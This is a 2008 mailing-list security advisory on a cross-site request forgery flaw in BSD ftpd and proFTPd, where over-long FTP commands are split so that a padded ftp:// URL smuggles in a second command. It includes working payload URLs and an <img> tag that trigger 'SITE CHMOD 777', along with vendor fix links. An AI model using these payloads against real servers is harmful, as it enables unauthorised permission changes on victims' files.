[<prev] [next>] [day] [month] [year] [list]
Message-ID: <cee9e69584cba856c685fa69a80a9bbe.qmail@home.pl>
Date: Fri, 26 Sep 2008 17:51:47 +0200
From: "Maksymilian Arciemowicz" <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: multiple vendor ftpd - Cross-site request forgery
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ multiple vendor ftpd - Cross-site request forgery ]
Author: Maksymilian Arciemowicz
securityreason.com
Date:
- - Written: 03.09.2008
- - Public: 26.09.2008
SecurityReason Research
SecurityAlert Id: 56
CVE: not assigned
SecurityRisk: Low
Affected Software:
This problem has been discovered on OpenBSD 4.3 .
- - Affected systems:
+ OpenBSD
+ NetBSD
+ FreeBSD
+ some linux
- - Affected applications:
+ proFTPd
+ others
Advisory URL:
http://securityreason.com/achievement_securityalert/56
- --- 0.Description ---
ftpd -- Internet File Transfer Protocol server
The ftpd utility is the Internet File Transfer Protocol server process. The
server uses the TCP protocol and listens at the port specified with the -P
option or in the ``ftp'' service specification; see services(5).
Cross-site request forgery, also known as one click attack, sidejacking or
session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of
malicious exploit of a website whereby unauthorized commands are
transmitted from a user the website trusts. Contrary to cross-site
scripting (XSS), which exploits the trust a user has for a particular site,
cross-site request forgery exploits the trust that a site has for a
particular user.
http://en.wikipedia.org/wiki/Cross-site_request_forgery
- --- 1. ftpd bsd - Cross-site request forgery ---
The main problem exists in dividing long command for few others. The
problem stems from the fact the use of the loop for(;;) and function
fgets().
Example:
Command
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
will be split for
500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA': command
not understood.
500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA'
When we try request to ftp deamon via browsers and path is longer 512<, our
URL will be split.
/* FreeBSD 7.0 */
ftp://cxib@....0.0.1///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST
return result from SYST command:
215 UNIX Type: L8 Version: BSD-199506
/* NetBSD 4.0 */
ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST
return result from SYST command:
215 UNIX Type: L8 Version: NetBSD-ftpd 20080609
The situation, can be dangerous, when this bug will be exploited like any
CSRF attack. We can use SITE CHMOD command to change file permission or
other combinations with ftp commands. Only we need some exploit and luck,
that admin will executed exploited url.
How to exploit it?
0.
Creating some html file with <img> tags
<img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">
..
1.
Give preparing URL for user.
Example:
ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE
will change permision to EXAMPLEFILE when the owner will use this URL.
I think, it should be some byte, what inform about overflowing (empty
command should nulling this byte). We have diagnosed this issue on BSD
systems. Unfortunately, we do not know exactly how many machines can be
affected.
- --- 2. How to fix ---
OpenBSD has been first informed. Fix is avalible on cvs:
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y
Thanks for OpenBSD Team.
NetBSD:
http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c
proFTPd:
http://bugs.proftpd.org/show_bug.cgi?id=3115
SecurityReason has informed only BSD developers and proFTPd Team.
- --- 3. Greets ---
sp3x infospec p_e_a pi3 schain
- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (OpenBSD)
iEYEARECAAYFAkjdBroACgkQpiCeOKaYa9aiFgCfSMm4Pb+2ELGr6WVNWcJHWz+8
3NgAoN6Owug0ezaLFqJ65xyrrDImtX3J
=8Rij
-----END PGP SIGNATURE-----
Best Regards,
------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib) <cxib@...urityreason.com>
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists